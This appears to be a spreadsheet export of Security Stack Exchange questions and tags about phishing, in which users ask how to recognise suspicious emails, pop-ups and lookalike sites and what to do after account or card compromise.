    <t>How to identify the phishing email originates from a compromised account or a compromised server?</t>
  </si>
  <si>
    <t>&lt;p&gt;We have a whale phishing case, in which the sender is from the insider (we're using Zimbra email service for some specific user groups). A cursory investigation indicated that this account had probably been compromised. &lt;/p&gt;
 &lt;p&gt;My concern here is that is there anyway for the hacker to take over this account through server? I assume no because the email was associated with the specific email account.&lt;/p&gt;
 &lt;p&gt;Look forward to receiving your support.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;server&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How Individuals apply remidiations</t>
  </si>
  <si>
    <t>Asking bank for loss compensation</t>
  </si>
  <si>
    <t>One Time Password via Text Message: Possible exploits?</t>
  </si>
  <si>
    <t>&lt;p&gt;Is there a credible scenario in which the OTP (One Time Password) for online credit card transactions ( specifically for Verified by Visa) can be bypassed? &lt;/p&gt;
 &lt;p&gt;Context: A guy I know was cheated via the usual social engineering routes (dumb I know!) into revealing his Credit Card details &amp;amp; a fraudulent transaction was made. The bank says an accurate OTP was entered and hence their liability ends. I tend to agree with them. &lt;/p&gt;
 &lt;p&gt;The victim OTOH insists that although he did give his Card Number, Expiry date &amp;amp; CVV to the phishers over the phone, he never gave them the OTP received via his cellphone SMS (text message). I find that hard to rationalize. &lt;/p&gt;
 &lt;p&gt;That's why I'm wondering if there really could be channels of attack that somehow defeat the OTP-SMS protection? The only possibility I could brainstorm is some variant of SIM card cloning. &lt;/p&gt;
 &lt;p&gt;What do people think? Know any exploit reports like this in the wild? (Normally I'd have not believed the victims insistence that he never revealed the OTP but I'm just playing devils advocate for a bit)&lt;/p&gt;
 &lt;p&gt;In case it matters, Verified by Visa uses a 4-6 digit OTP sent via text message &amp;amp; it is supposed to expire in 180 secs. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;one-time-password&gt;</t>
  </si>
  <si>
    <t>What measures to take after attack?</t>
  </si>
  <si>
    <t>Apart from losing ‚Ç¨40, is there any further risk if someone has my prepaid credit card number and home address?</t>
  </si>
  <si>
    <t>&lt;p&gt;My girl was scammed and entered my home address and my credit card number on a fake website (through a Facebook ad). What risks am I additionally incurring, apart from having lost ‚Ç¨40 (the money that was on the card, and luckily that is one of the cards that you have to charge in advance to make a purchase)? Is there something especially urgent I have to do?&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;My card description:&lt;/strong&gt;&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Can only pay what I first charge in&lt;/li&gt;
 &lt;li&gt;Do not allow to transfer money to my bank account&lt;/li&gt;
 &lt;li&gt;I choosen that card to lose at most the money is in it (Even if my bank insisted I choose instead another type of card).&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;credit-card&gt;&lt;phishing&gt;&lt;scam&gt;</t>
  </si>
  <si>
    <t>I stupidly responded to an email from a hacker posing as a friend</t>
  </si>
  <si>
    <t>&lt;p&gt;I responded to an email from a hacker posing as a friend in distress. I have a really long secure password ... caps/special figures/numbers/over 14 characters long. My account name is my first, middle initial, and last name. I just changed my security question to something I believe is not guessable. I have other accounts associated with my account that are not as secure (password not as long/no special figures or caps) and am going about changing their security questions and passwords. Anything else I should do? Do you think I'll be ok?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Accidently opened a phishing email, is my computer infected by malware?</t>
  </si>
  <si>
    <t>&lt;p&gt;I was looking through my unread emails when I accidently opened a Paypal phishing one. I thought it was legit because I saw in the preview it was from "Service-Intl@Paypal.com", but I got some doubt after noticing the email was full of grammar mistakes and was using shorted links. Looked at some legit Paypal emails I received and those were from "service@intl.paypal.com". So, I definitively opened a phishing email.&lt;/p&gt;
 &lt;p&gt;I'm really parano√Ød about computer security. I usually use virtual machines to surf the web and open such emails on my daily driver OS, but that time I made the mistake and opened that email directly on.&lt;/p&gt;
 &lt;p&gt;I know that phishing goals aren't usually to infect computers with malware, but now I feel a bit insecure since I usually don't open emails from unknown senders.&lt;/p&gt;
 &lt;p&gt;I did a drive image, redeployed it on another computer then run MalwareBytes, SpyBot Search &amp;amp; Destroy as well as a McAfee Antivirus scan. Nothing suspicious was found. Drive image was to avoid installing all those antivirus softwares on my daily driver OS since they usually leave some unwanted files or registry entries after uninstalling.&lt;/p&gt;
 &lt;p&gt;I grabbed a copy of the phishing email (.eml) to inspect it, there was some links like "paypal=objects.com/digitalassets...", few "t.co" shortened URLs (which would actually redirect to the phishing site) and some links from MailChimp, such as "gallery.mailchimp.com/...". Opened the "t.co" links in a virtual machine, currently broken. Note that the email was been in my mailbox since this January, so links were probably flagged way before I opened that email. Some screenshots of that phishing email are in attachment to that question. &lt;/p&gt;
 &lt;p&gt;Automatic picture download as well as email preview were turned on. I'm using Windows 10 Mail App.&lt;/p&gt;
 &lt;p&gt;Considering all of this, should I format my hard drive then completely reinstall my daily driver Windows to be sure I'm safe from malware which could come from opening that email (without clicking links on) ? Or that doesn't worth it ?&lt;a href="https://i.stack.imgur.com/TFT8o.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/TFT8o.png" alt="email content"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;My configuration is :
 Windows 10 (with all updates),
 Windows 10 Mail App,
 Windows Defender&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;email&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>My Apple ID has been compromised. What do I do?</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; Called Apple today and according to them they could not get an IP-address from user logins or was not allowed to give that out. They also said that I would be able to see any message that had been sent from iMessage on any other logged in device. Since I did not see anything the attacker did not send any messages.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Original:&lt;/strong&gt; First of all I hope this question fits the scope of &amp;quot;can be answered, not just discussed&amp;quot; and I don't want this to be closed as too broad so this is strictly Apple ID even if it in most cases can be the same for other online accounts.&lt;/p&gt;
 &lt;p&gt;Background story is I was using the iPhone (4) five years ago but has since been using Android. Two weeks ago I decided to go back and try out the new iPhone 7+ since Samsungs recent phones have been burning up.&lt;/p&gt;
 &lt;p&gt;I then received an email containing the following information earlier this evening. It was in Swedish but it should look like this in English:&lt;/p&gt;
 &lt;p&gt;Subject:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;Your Apple ID was used to sign in to iMessage on an iPhone 6&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Message:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;Your Apple ID () was used to sign in to iMessage on an iPhone 6 named
 &amp;quot;iPhone&amp;quot;.&lt;/p&gt;
 &lt;p&gt;Date and Time: November 12, 2016, 13.44 PST&lt;/p&gt;
 &lt;p&gt;Operating System: iOS 9.2.1&lt;/p&gt;
 &lt;p&gt;If the information above looks familiar, you can disregard this
 email.&lt;/p&gt;
 &lt;p&gt;If you have not recently signed in to an iPhone 6 with your
 Apple ID and believe someone may have accessed your account, go to
 Apple ID (&lt;a href="https://appleid.apple.com" rel="nofollow noreferrer"&gt;https://appleid.apple.com&lt;/a&gt;) and change your password as soon
 as possible.&lt;/p&gt;
 &lt;p&gt;Apple Support&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;If anyone thinks this is a phishing email like &lt;a href="https://www.theinternetpatrol.com/your-apple-id-wasnt-used-to-sign-in-to-facetime-icloud-and-imessage-on-an-iphone-5/" rel="nofollow noreferrer"&gt;this&lt;/a&gt;, all URL links led to apple.com or a sub domain of apple.com. I think this was real. I acted on it 10 minutes after receiving it, immediately after reading.&lt;/p&gt;
 &lt;p&gt;My first actions were the following:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Login to my account and reset the current password. This required
 answering my security questions which should have slowed a hacker
 down.&lt;/li&gt;
 &lt;li&gt;Check the Account tab so that no other email address or phone number was added as back up email or rescue email. This was not the case.&lt;/li&gt;
 &lt;li&gt;Check the Devices tab for signed in devices at:
 &lt;a href="https://appleid.apple.com/account/manage" rel="nofollow noreferrer"&gt;https://appleid.apple.com/account/manage&lt;/a&gt;. I could only see my device
 there and not an iPhone 6.&lt;/li&gt;
 &lt;li&gt;Check credit card for any transaction, nothing here. Turned out my account had an expired credit card anyway but It could have been an active one.&lt;/li&gt;
 &lt;li&gt;Check order information to see that nothing has been ordered in my name. Nothing here either.&lt;/li&gt;
 &lt;li&gt;Check iMessage if anything had been written, nothing.&lt;/li&gt;
 &lt;li&gt;Check iCloud for back up of attackers iPhone, nope.&lt;/li&gt;
 &lt;li&gt;Check Find My iPhone on icloud.com for attackers iPhone, no luck.&lt;/li&gt;
 &lt;li&gt;Looked for an email to contact Apple but it seems phone was the only alternative. Since nothing has happened on the account I decided not to call.&lt;/li&gt;
 &lt;li&gt;Tried to set up two-step verification but since my password had been
 changed I was not allowed to do that. Will do as soon as it is possible:&lt;/li&gt;
 &lt;/ul&gt;
 &lt;blockquote&gt;
 &lt;p&gt;&amp;quot;You must wait 3 days before enabling two-step verification. For
 security reasons, you cannot set up two-step verification immediately
 after significant changes have been made to your account. This helps
 ensure that only the owner of this Apple ID can set up two-step
 verification.&lt;/p&gt;
 &lt;p&gt;A notification email will be sent to all addresses on file in your
 account.&amp;quot;&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Luckily I had a unique password for my Apple ID so no other service should be compromised. I normally use a complex generated password in a password manager but I had not started using that five years ago when the account was created and I did not update the password since it was unique anyway. I'm also using two step verification wherever I can normally but I had not yet implemented it here.&lt;/p&gt;
 &lt;p&gt;Have I forgotten anything to do and can I do anything more to track this down?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;passwords&gt;&lt;fraud&gt;</t>
  </si>
  <si>
    <t>When my account is compromised, how can I logout of all open sessions after changeing my password</t>
  </si>
  <si>
    <t>Is there guidance that says all sessions to be logged off when a user changes their password?</t>
  </si>
  <si>
    <t>&lt;p&gt;Often when an account is hacked, security guidance is to change your password. However I've noticed that changing a password sometimes isn't enough to log out of other sessions that are active.&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Is there any accepted security guidance that recommends or requires that all logon sessions are expired and must be re-authenticated? This could be industry specific, or from a respected government or private company that publishes similar guidance.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;I found an interesting approach in practice, where Facebook gives the user the option to disconnect all sessions&lt;/p&gt;
 &lt;p&gt;&lt;img src="https://i.stack.imgur.com/RPIAS.png" alt="enter image description here"&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;passwords&gt;&lt;appsec&gt;&lt;csrf&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>remove?</t>
  </si>
  <si>
    <t>Using Noscript while opening links</t>
  </si>
  <si>
    <t>&lt;p&gt;I opened two emails. Supposedly one was from Zendesk (the other I did not realize was from another source. Attention was elsewhere). Anyhow, I clicked on the unsubscribe button. Normally, this a good policy for legitimate sources. Men don't always multitask very well :/&lt;/p&gt;
 &lt;p&gt;In this case, I clicked on the one from the supposedly non-legitimate source. I was wondering, since I have noscript on at all times, could I possibly get infected? All I got was a spinning circle (in the tab) with the new tab internal address. &lt;/p&gt;
 &lt;p&gt;Note: I obviously have the scripts enabled for my email provider. But not for random websites.&lt;/p&gt;
 &lt;p&gt;According to the Zendesk email, they claim that the person/group had some malware. Something about a file or something. Now, I have zero clue whether that email itself is legitimate at this point. Have I dealt with Zendesk in the past? Yes. With which email account? I cannot remember. &lt;/p&gt;
 &lt;p&gt;In any event, the email does not come with an attachment as Zendesk claimed it would. Anyhow, this is what they wrote:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Your computer(s) may be infected with a virus if you recently&lt;/strong&gt;:&lt;/p&gt;
  &lt;p&gt;Opened a file from "Joyce Lim" named "info.xls", "information.xls",
  "infos.xls", "mail.xls", "market.xls", or "marketing.xls" related to a
  job opening entitled "Need mail and other lead generation
  consultation." Enabled macros from the file, or already had your
  macros enabled&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;I am currently running MBAM, and will run superantispyware afterwards, and then Avast. Finally, I will run norton power eraser.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;virus&gt;&lt;spam&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Measures taken after compromise notification</t>
  </si>
  <si>
    <t>Is there a way to forward unknown land line callers to a specific number in a manner similar to nomorobo?</t>
  </si>
  <si>
    <t>&lt;p&gt;My parents are getting up there in age and recently, my dad asked me about a message on his answering machine from "Apple" saying his account was "compromised". After having educated him on phishing calls, I'm somewhat exasperated that he thought the message was authentic, so I had an idea to manually screen calls for him that aren't from a whitelist.&lt;/p&gt;
 &lt;p&gt;I looked through the features from his landline voice provider to look for an unknown caller forwarding option, but there does not appear to be a way to forward calls from callers not on a whitelist. You can only forward specific callers or all callers. Nor did I want to enable the 'accept selected callers' feature because there's no way to screen legitimate calls, including calls &lt;em&gt;from&lt;/em&gt; 911.&lt;/p&gt;
 &lt;p&gt;I set up nomorobo for my parents about a year or so ago (but it doesn't seem to block spoofers like the "Apple" caller) and I was wondering if there was some way to do something similar (such as a service or some device or process), but instead of working from a list of known scam numbers and block them, I'd like it to check the caller against a whitelist I set up and if not on the whitelist, forward the call to me and allow me to decide whether to let the call through or not (e.g. press 1 to add the caller to the whitelist and forward the call back to my dad - or 2 to blacklist them &amp;amp; hang up). Ideally, I would be able to do this either while my phone is ringing based on the caller ID or even after having picked up and spoken to the caller.&lt;/p&gt;
 &lt;p&gt;Note that they have the ability to see caller ID info on their TV (though I don‚Äôt know if that can be used to accomplish what I‚Äôm going for here).&lt;/p&gt;
 &lt;p&gt;As a person with elderly parents and increasing phishing on the elderly, it seems like such a solution would be popular, at least for this niche group. I found a service in the UK called "Fuss Free Phones" that has operators that essentially do what I'm proposing, but they're shutting down (probably because it's a bad business model to employ real-person operators to handle today's scam volume). But if you crowd-source the "operators", to those who actually care about the person being called, maybe it could work.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;phone&gt;&lt;scam&gt;</t>
  </si>
  <si>
    <t>Why is a link posted to Facebook going through all redirects and showing info for final page only?</t>
  </si>
  <si>
    <t>&lt;p&gt;Today I read a post on a Facebook-group about a "problem" with links posted to Facebook.&lt;/p&gt;
 &lt;p&gt;Appearently when you post a link at Facebook, the sites goes through the redirect(s) that may be on the site which is linked to in the first place (link to phishers site --&gt; redirect to legitimate site = facebook shows content of legitimate site). &lt;/p&gt;
 &lt;p&gt;If the owner of the first site afterwards remove the redirect, you will now have a link looking quite legitimate (depending on the site to which you redirect initially), but may be a scam phishing site!&lt;/p&gt;
 &lt;p&gt;I am far away from being deep into security matters, but this seems rather stupid to me and as a obvious problem with eg. contest pages or "Like if you also like turtles"-pages. &lt;/p&gt;
 &lt;p&gt;Why do Facebook have this "feature" and how could they eventually avoid it (updating link regularly or by request or similar)?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;url-redirection&gt;&lt;facebook&gt;</t>
  </si>
  <si>
    <t>Compromised website</t>
  </si>
  <si>
    <t>What is the vulnerability in my PHP code?</t>
  </si>
  <si>
    <t>&lt;p&gt;A website of mine was recently hacked. Although the actual website remain unchanged, they were somehow able to use the domain to create a link that re-directed to an ebay phishing scam.&lt;/p&gt;
 &lt;p&gt;I've taken the website down, for obvious reasons, so I can't link to the code. I'm wondering how I can go about finding out what vulnerability they used so that I can avoid this problem in the future. The page used PHP, and also some javascript (for form validation).&lt;/p&gt;
 &lt;p&gt;Is there a free service that will scan my code for vulnerabilities? What are my other options?&lt;/p&gt;
 &lt;p&gt;If anyone's willing to take the time to look it over, I will gladly .zip up the code and host it somewhere...&lt;/p&gt;
 &lt;p&gt;Thanks, Jeff&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;appsec&gt;&lt;php&gt;&lt;code-review&gt;&lt;vulnerability-scanners&gt;&lt;url-redirection&gt;</t>
  </si>
  <si>
    <t>user32389</t>
  </si>
  <si>
    <t>An email from a friend or a colleague. Where to report it?</t>
  </si>
  <si>
    <t>Is this a phishing attempt? if yes where to report?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received strange email from co-worker, asking me to click the link.&lt;/p&gt;
 &lt;p&gt;I did eventually follow the link, but thought putting in my gmail user/pass wasn't wise. What do you think? is this phishing attack? if yes where do I report it and get it taken down?&lt;/p&gt;
 &lt;p&gt;Link: www.collectablelegends.com.au/googledoc/Secure Login.html&lt;/p&gt;
 &lt;p&gt;Regarding my question, where to report it I found it here: &lt;a href="https://security.stackexchange.com/questions/1728/where-to-report-malicious-urls-phishing-and-malicious-web-sites"&gt;Where to report malicious URLs, phishing, and malicious web sites?&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>Legit company uses sesveral domains</t>
  </si>
  <si>
    <t>How to detect phishing emails in the future?</t>
  </si>
  <si>
    <t>&lt;p&gt;My main tactic (amongst others, see related questions) of how I detect phishing emails are through the use of the obviously wrong sender domain.&lt;/p&gt;
 &lt;p&gt;I see a trend that big companies start to use dedicated domains for their services such as &lt;code&gt;facebookmail.com&lt;/code&gt; or encourage us to click on links such as &lt;code&gt;https://epl.paypal-communication.com&lt;/code&gt;. I just received an email from &lt;code&gt;microsoftadvertising.com&lt;/code&gt;. So we are being &amp;quot;re&amp;quot;-trained to trust domains other than the official ones.&lt;/p&gt;
 &lt;p&gt;How do I detect spam/phishing emails in the future when bad folks start sending perfect phishing emails that pass SPF/DKIM/DMARC, have legitimate account information, use no grammar mistakes, use good/original CSS/HTML/JS, and more? So when it boils down that from my perspective, the only way is to extensively search for whether the sending domain belongs to the authoritative company?&lt;/p&gt;
 &lt;p&gt;Related questions:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;a href="https://security.stackexchange.com/questions/237230/should-big-companies-publicly-list-their-legit-emails-and-links"&gt;Should big companies publicly list their legit emails and links?&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a href="https://security.stackexchange.com/questions/225729/phishing-emails-what-do-i-look-for"&gt;Phishing emails - What do I look for?&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a href="https://security.stackexchange.com/questions/182161/why-would-paypal-send-messages-from-another-domain"&gt;Why would PayPal send messages from another domain?&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>Webhosting services</t>
  </si>
  <si>
    <t>Can subdomains of trusted domains be registered for malicious use?</t>
  </si>
  <si>
    <t>&lt;p&gt;I was working on a rule that reports phishing sites, and I wanted to exclude known domains, such as &lt;code&gt;.microsoft.com&lt;/code&gt; etc, and a doubt arose: can someone register a subdomain of a known site to phishing purposes? I came across this &lt;a href="https://www.securityweek.com/over-600-microsoft-subdomains-can-be-hijacked-researchers" rel="nofollow noreferrer"&gt;article&lt;/a&gt;, where there is a &lt;a href="https://youtu.be/Jg3mkLm2K2g" rel="nofollow noreferrer"&gt;video&lt;/a&gt; demonstration.
 So, 2 questions:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Is it possible to register a subdomain of a known company for malicious use?&lt;/li&gt;
 &lt;li&gt;In the video, I imagine that &amp;quot;under the hood&amp;quot; two queries are sent, one to the legit site, the other one to the malicious one; if I have a rule, like a firewall rule, prohibiting communication with domains that are not legit, do I avoid the threat exposed in the video?&lt;/li&gt;
 &lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;sub-domain&gt;</t>
  </si>
  <si>
    <t>Educating end-users</t>
  </si>
  <si>
    <t>Verifying the identity of the sender</t>
  </si>
  <si>
    <t>How to detect &amp; prevent fake emails?</t>
  </si>
  <si>
    <t>&lt;p&gt;I hope this question not same as this one: 
 &lt;a href="https://security.stackexchange.com/questions/26198/e-mail-can-be-made-to-appear-like-it-came-from-a-big-organization"&gt;E-mail can be made to appear like it came from a big organization?&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;I'm not asking how to protect brands and large organizations (Google, Yahoo, etc.), but how can normal users protect themselves.&lt;/p&gt;
 &lt;p&gt;As far as I know there are worms that can get an email's address books, and there are programming libraries that enables users to craft packets .&lt;/p&gt;
 &lt;p&gt;By using both (stealing the address and crafting an email packet and send it to the right server), a malicious hacker should be able to send the victim an email that will look like it came from one of his friends (asking for money for example).&lt;/p&gt;
 &lt;p&gt;So beside the typical way, (calling the one that the hacker claimed to be), is there a technical way to detect such fake messages?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;attack-prevention&gt;&lt;phishing&gt;&lt;spoofing&gt;</t>
  </si>
  <si>
    <t>An email from gaia.bounces.google.com</t>
  </si>
  <si>
    <t>&lt;p&gt;I received an email from gaia.bounces.google.com, supposedly from Google, which asked me to click on a link to check my security status. Is this legitimate? I searched with my Norton Safe Search but couldn't find this .com at all.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Emails received from a spoofed domain</t>
  </si>
  <si>
    <t>Why is still so easy to send phishing emails?</t>
  </si>
  <si>
    <t>&lt;p&gt;When I first started playing around with how SMTP worked over 20 years ago, I remember being somewhat surprised how easy it was to make an email appear in someone else's mailbox that looked like it came from anyone at all.&lt;/p&gt;
 &lt;p&gt;These days, SMTP servers do tend to be somewhat stricter about forwarding on emails that are not from addresses they are configured to handle, but the fact remains that, for instance, in my hotmail account, I receive at least once a week an email that purports to be from apple.com or anz.com.au (a local bank) etc. etc., with nothing at all in the email that suggests it did not originate from a mail server owned by said organisation.&lt;/p&gt;
 &lt;p&gt;The obvious question is why is this still so broken, when it should be so easy to fix? If I browse on the web to &lt;a href="https://www.apple.com" rel="noreferrer"&gt;https://www.apple.com&lt;/a&gt;, I'm given a pretty strong guarantee that what I'm looking at is legitimately owned and/or managed by Apple Corporation, but if I receive an email that says it's from support@apple.com there appears to be no such guarantee at all. &lt;/p&gt;
 &lt;p&gt;I'm aware there are protocols and standards for signing emails (DKIM etc.) but it seems they're so little used that few popular mail clients even bother to check for them.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;smtp&gt;&lt;email-spoofing&gt;&lt;dkim&gt;</t>
  </si>
  <si>
    <t>Google Rabbit hole phishing?</t>
  </si>
  <si>
    <t>Suspicious GitHub mirror site (https://hzb.world/)</t>
  </si>
  <si>
    <t>&lt;p&gt;Through some odd Google rabbit hole, I ended up at what appeared to be the GitHub website. I reflexively tried logging in to view my repositories. Upon attempting to log in, it said my browser did something "odd", and the login failed.&lt;/p&gt;
 &lt;p&gt;I checked the browser URL and it had instead, at the top &lt;code&gt;https://hzb.world/&lt;/code&gt;. Fearing this was some sort of phishing expedition, I immediately went and changed my password on GitHub and set up 2FA.&lt;/p&gt;
 &lt;p&gt;Googling &lt;code&gt;https://hzb.world/&lt;/code&gt; came up with literally nothing. What is going on here?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;github&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> allow redirects for unknown website</t>
  </si>
  <si>
    <t>Outlook was redirected to the server clblgn.sceur.ch to get new settings</t>
  </si>
  <si>
    <t>&lt;p&gt;I (that is, we, our company) has clicked on "Allow" when Outlook has presented us with a redirect to &lt;code&gt;autodiscover-s.outlook.com&lt;/code&gt; on our macs to get new settings. Today, we got a popup asking to connect to clblgn.sceur.ch to get new settings. I fear some security breach, can someone tell me what this might be?&lt;/p&gt;
 &lt;p&gt;Thank you.&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/r058l.jpg" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/r058l.jpg" alt="Here is a picture of the scary popups"&gt;&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;outlook&gt;</t>
  </si>
  <si>
    <t>Registered to a website but received an emails from another domain</t>
  </si>
  <si>
    <t>I have registered a .com domain and received an e-mail from domainadmin.com</t>
  </si>
  <si>
    <t>&lt;p&gt;I have registered a .com domain and received an e-mail from domainadmin.com, it looks extremely like a phishing e-mail, but after a research I am ultimately confused whether this thing is legitimate or not, it seems as something new for sure.&lt;/p&gt;
 &lt;p&gt;It basically asks you to click a button, where you agree to some terms and conditions that I don't want to read, as I've got other work to do. There is the contract: &lt;a href="http://approve.domainadmin.com/registrant/index.cgi?action=contract" rel="noreferrer"&gt;http://approve.domainadmin.com/registrant/index.cgi?action=contract&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;And this is the e-mail I received:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;Please read this important e-mail carefully.&lt;/p&gt;
 &lt;p&gt;Recently you registered, transferred or modified the contact information for the following domain name:&lt;/p&gt;
 &lt;p&gt;domain.com&lt;/p&gt;
 &lt;p&gt;In order to ensure your domain name remain active, you must now click the following link and follow the instructions provided.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Did anyone come across?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;websites&gt;</t>
  </si>
  <si>
    <t>Reporting websites with typos</t>
  </si>
  <si>
    <t>Is there anything that a regular user can do to help remove fake websites?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm talking about domains like &lt;code&gt;msn.org&lt;/code&gt; and &lt;code&gt;stackoveflow.com&lt;/code&gt; that impersonate major websites and serve up malicious ads such as the "critical alert from Microsoft" ad.&lt;/p&gt;
 &lt;p&gt;I've tried reporting these ads to the companies before but they seem to just ignore my emails and I've tried reporting them to their web and domain host but they either say that it's not their problem or that the websites aren't malicious (???).&lt;/p&gt;
 &lt;p&gt;I've also tried reporting them through &lt;a href="https://www.google.com/webmasters/tools/spamreportform?hl=en" rel="nofollow noreferrer"&gt;Google's spam report form&lt;/a&gt; and &lt;a href="https://safebrowsing.google.com/safebrowsing/report_badware/" rel="nofollow noreferrer"&gt;malicious software form&lt;/a&gt; but Chrome still doesn't block them as being unsafe websites, so I'm not sure that they even read the reports.&lt;/p&gt;
 &lt;p&gt;Is there anything else that can be done?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;phishing&gt;&lt;websites&gt;</t>
  </si>
  <si>
    <t>Unrequested one-time passcode</t>
  </si>
  <si>
    <t>Should I reply to an email saying that I requested online access to a website?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received an email saying I requested access to a website. The email also includes a one-time passcode. I did not do anything that would require a one-time passcode. At the bottom of the email is a disclaimer saying something like "If you have received this message by mistake, please immediately notify us by replying to the message and delete the original message immediately thereafter." &lt;/p&gt;
 &lt;p&gt;I'm wondering if I should do this or not? It might be a good idea to reply to them in case someone is trying to hack into one of my accounts. Or someone tried to create an account with my email by mistake. Or it could be that they have a bug in their system so it would be a good idea to let them know. On the other hand, I'm worried that this could be a social engineering attack. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;one-time-password&gt;&lt;social-engineering&gt;</t>
  </si>
  <si>
    <t>Is this a legitimate Microsoft email or is this a Phishing email and how can I tell?</t>
  </si>
  <si>
    <t>&lt;p&gt;I am a mobile application developer using &lt;code&gt;Microsoft Azure&lt;/code&gt; with my &lt;code&gt;MSDN&lt;/code&gt; subscription to develop my back-end of the application.&lt;/p&gt;
 &lt;p&gt;Today I got the following email:
  &lt;a href="https://i.stack.imgur.com/28H27.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/28H27.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;So given my above background this email seems to be correct. But there are a few red flags here for me:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;The email was sent from &lt;strong&gt;mscloude@clickdimensions.microsoft.com&lt;/strong&gt;. Doing a &lt;a href="http://who.is/whois/clickdimensions.com" rel="nofollow noreferrer"&gt;WhoIs&lt;/a&gt; on clickdimensions.com I can see no connection to Microsoft&lt;/li&gt;
 &lt;li&gt;The email starts "Dear Customer" instead of "Dear [My Name]" another red flag for me&lt;/li&gt;
 &lt;li&gt;There is no mention of the name of the VM in question which is strange&lt;/li&gt;
 &lt;li&gt;It is very strange that I have to reply to an email to keep my VM alive, what am I even supposed to write in the reply?&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;I haven't clicked the link but it seems to link to a clickdimensions site and I haven't replied to the email. I am confused to what the payload is if this is infact a phishing scam.&lt;/p&gt;
 &lt;p&gt;Is this a phishing scam or just a badly written Microsoft email? &lt;/p&gt;
 &lt;p&gt;What should I be looking out for when identifying a phishing email?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Pop-up window</t>
  </si>
  <si>
    <t>How to check if iCloud password popup is legitimate?</t>
  </si>
  <si>
    <t>&lt;p&gt;I was away from the computer when this popup appeared and I've no idea what triggered it. How do I know if it's legitimate popup from App Store or a phishing attempt by some malware?&lt;/p&gt;
 &lt;p&gt;Back in my WindowsNT days I would be prompted to press CTRL+ALT+DEL which is intercepted in the kernel and always opens system password prompt, so it's more secure.&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/c5UQs.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/c5UQs.png" alt="prompt screenshot"&gt;&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;macos&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>General reporting</t>
  </si>
  <si>
    <t>What is a good method to report security breaches that are being used to actively spam?</t>
  </si>
  <si>
